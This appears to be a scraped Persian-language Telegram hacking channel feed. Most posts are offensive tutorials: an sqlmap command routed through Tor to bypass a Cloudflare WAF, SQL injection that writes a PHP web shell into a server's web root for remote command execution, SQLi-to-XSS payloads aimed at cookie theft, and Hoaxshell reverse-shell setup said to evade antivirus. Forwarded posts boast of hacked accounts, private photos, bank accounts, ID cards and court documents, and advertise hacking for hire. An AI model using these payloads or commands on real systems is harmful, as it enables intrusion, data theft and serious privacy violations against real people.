3.57K subscribers
1.58K photos
218 videos
70 files
1.39K links
Download Telegram
نحوه بای پس WAF با sqlmap

اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.

شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین می‌توانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.

برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید

sudo apt install privoxy -y 
sudo /etc/init.d/privoxy start
در نهایت حمله را شروع کنید!

python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor
#Sqlmap


#NULL🖤
https://t.me/Kali_Linux_NULL
اولین کاری که انجام می دهیم این است که بررسی کنیم sql در کجا روی سرور اجرا می شود. این کار با تزریق دستور  @@datadir به پرس و جوی sql انجام می شود تا مسیر کامل مکان آن در سرور به دست آید.

مثال:

با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:


union select 1,@@datadir,3,4 --
و خروجی به صورت زیر خواهد بود:

C:\xampp\mysql\data\

چگونه SQLI به RCE را اجرا کنیم؟

با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs

با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
union select 1,<php_payload>,3,4 into outfile <path> --

مثال:
union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --

و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:

<host>/rce.php?cmd=<command>
برای رسیدن به SiXSS باید مراحل زیر را طی کنیم.

من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راه‌ها نیز هست، به عنوان مثال یک وب‌سایت آسیب‌پذیر را در نظر می‌گیریم.

exploitable-web.com/link.php?id=1

وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:

' ;<img src=x onerror=prompt(/XSS/)>
تزریق بالا یک کادر محاوره ای را نشان می دهد که XSS می گوید. این یکی حمله اساسی است. حالا بیایید ببینیم چگونه می توانیم XSS را به روشی بهتر تزریق کنیم. تزریق XSS به Query. هنگامی که دریافت Number of Column انجام شد و ما برای Union Query آماده هستیم. فرض کنید 4 ستون داریم، بنابراین کوئری اتحادیه ما به صورت زیر خواهد بود:
http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--
فرض کنید ستون 3 به عنوان خروجی در صفحه وب چاپ می شود. بنابراین بار XSS خود را به آن تزریق می کنیم. برای ساده کردن کارها، بار خود را به صورت هگز کدگذاری می کنیم. بار تزریق XSS ما :

<img src=x onerror=confirm(/XSS/)>
مقدار کدگذاری شده Hex :
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
تزریق پیلود ما:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--
لینک XSS ما را به وب سایت خروجی می دهد. این یکی از پیلود های اولیه XSS است، اکنون ما آزاد هستیم تا با استفاده از XSS کارهای دیگری مانند سرقت کوکی، فیشینگ XSS، فیشینگ XSS iFrame، XSS زنجیره‌ای، ربودن جلسه، حمله CSRF، XssDdos و سایر حملات را انجام دهیم .

جمع اوری و ترجمه شده از سایت Sqli to Xss
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته می‌شود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from هک شدگان
بسم رب چشای اونی که کنارم نیست🖤

زدن تیمNULL چند اتک کوچیک
Targat1
زدن قفلی483تا روبیکا🔰
Targat2
هک شدن چند عکس دختر
Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat3
13شماره هک شده توسط بنده

Targat4
هک کردن چند شماره حساب بانکی
Targat5
چند شناسنامه های فرد
Shot  Shot  Shot Shot
Targat6
چند مدارک دادگاهی یه فرد 🐇
Shot  Shot  Shot  Shot  Shot Shot Shot Shot Shot
Targat7
هک شدن چند ایمیل

برای درخواست هک پی بنده🎃
@Radkor_report

معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
بررسی آسیب‌پذیری‌های بازنشانی رمز عبور

[View]

حتما بخونید
#NULL🖤
https://t.me/Kali_Linux_NULL
آسیب پذیری های Web Cache با توجه به معماری های جدید نرم‌افزاری میتونن برای یک کسب‌و‌کار کاملا خطرناک باشن، مثلا Paypal برای آسیب پذیری DoS از این طریق 9700$ بانتی داده
اسکنر زیر میتونه گزینه خوبی جهت آزمایش این نوع از آسیب پذیری ها باشه

https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner

#NULL🖤
https://t.me/Kali_Linux_NULL
آسیب پذیری که منجر به AMSI BYPASS می شود

حالا اصلا AMSI چیه؟

معرفی آسیب‌پذیری AMSI
رابط اسکن ضد بدافزار مایکروسافت (AMSI) که در ویندوز 10 و نسخه های بعدی ویندوز موجود است، برای کمک به شناسایی و جلوگیری از بدافزار طراحی شده است. AMSI رابطی است که برنامه‌های امنیتی مختلف (مانند نرم‌افزارهای آنتی ویروس یا ضد بدافزار) را در برنامه‌ها و نرم‌افزارها ادغام می‌کند و رفتار آنها را قبل از اجرا بررسی می‌کند. مربی فنی OffSec، Victor "Vixx" Khoury یک ورودی قابل نوشتن در System.Management.Automation.dll کشف کرد  که حاوی آدرس AmsiScanBuffer ، یک جزء مهم AMSI است که باید فقط خواندنی علامت گذاری می شد، شبیه به جدول آدرس واردات (IAT) ورودی های. در این پست وبلاگ، این آسیب‌پذیری را تشریح می‌کنیم و نشان می‌دهیم که چگونه Vixx از آن در یک دور زدن AMSI 0 روزه استفاده کرده است. این آسیب‌پذیری در ۸ آوریل ۲۰۲۴ به مایکروسافت گزارش شد.


اطلاعات کامل - https://www.offsec.com/offsec/amsi-write-raid-0day-vulnerability/

POC - https://github.com/V-i-x-x/AMSI-BYPASS

#NULL🖤
https://t.me/Kali_Linux_NULL
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته می‌شود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
ابزار Hoaxshell 🕷
با استفاده از این ابزار میتونید خیلی راحت پیلود reverse shell بسازید یا به عبارتی دیگر با استفاده از پیلود ساخته شده با این ابزار میتونید دسترسی شل از سیستم بگیرید !💀

این ابزار قادر به ساخت پیلودی است که به راحتی با آنتی ویروس ها شناسایی نمیشه !🕷️
🟡خب بریم برای نصب : 💥
🐱 git clone https://github.com/t3l3machus/hoaxshell

cd ./hoaxshell

sudo pip3 install -r requirements.txt

chmod +x hoaxshell.py

بعد نصب برای ساخت پیلود دستور زیرو بزنید 💀

sudo python3 hoaxshell.py -s <your_ip>


بعد توی خروجی شما با یه کد مواجه میشید اون اصل کاری هستش  و باید توی  PowerShell یا CMD سیستم مورد نظر وارد کنید !

رفقا به این پست ریکشن بزنید.
😈 فردا میریم برای ریکورد و حمله خارج از شبکه با استفاده از
این پیلود reverse shell  🟦

ببینم چه میکنید .☠️

📱 #NULL🖤
https://t.me/Kali_Linux_NULL🖱

🔤🔤🔤🔤🔤🔤   🔤🔤🔤🔤
آمار بشه ۴ کا یع سورپرایز دارین
Forwarded from .
شماره مجازی انگلیس ( پرمیوم )
+44 73896**776
اکانت یک ساله دستمه تضمینه
پرمیومش دو ماه وقت داره
قابلیت چنچ داره و ایمیلی هستش
کارت به کارت فقط

@Cadillacm < جهت خرید پیام بدید
اکانت شماره مجازی جاهای دیگه هم موجوده
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from زاپاس
اک یه نوب آیدی نداشت❤️

خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃

https://t.me/Kali_Linux_NULL

https://t.me/Program_writing
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته می‌شود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from زاپاس
خام بود❤️

خرید پکیچ پی بنده🧪
@Radkor_report
@Mmd_Yadgari
چنلمون🎃

https://t.me/Kali_Linux_NULL

https://t.me/Program_writing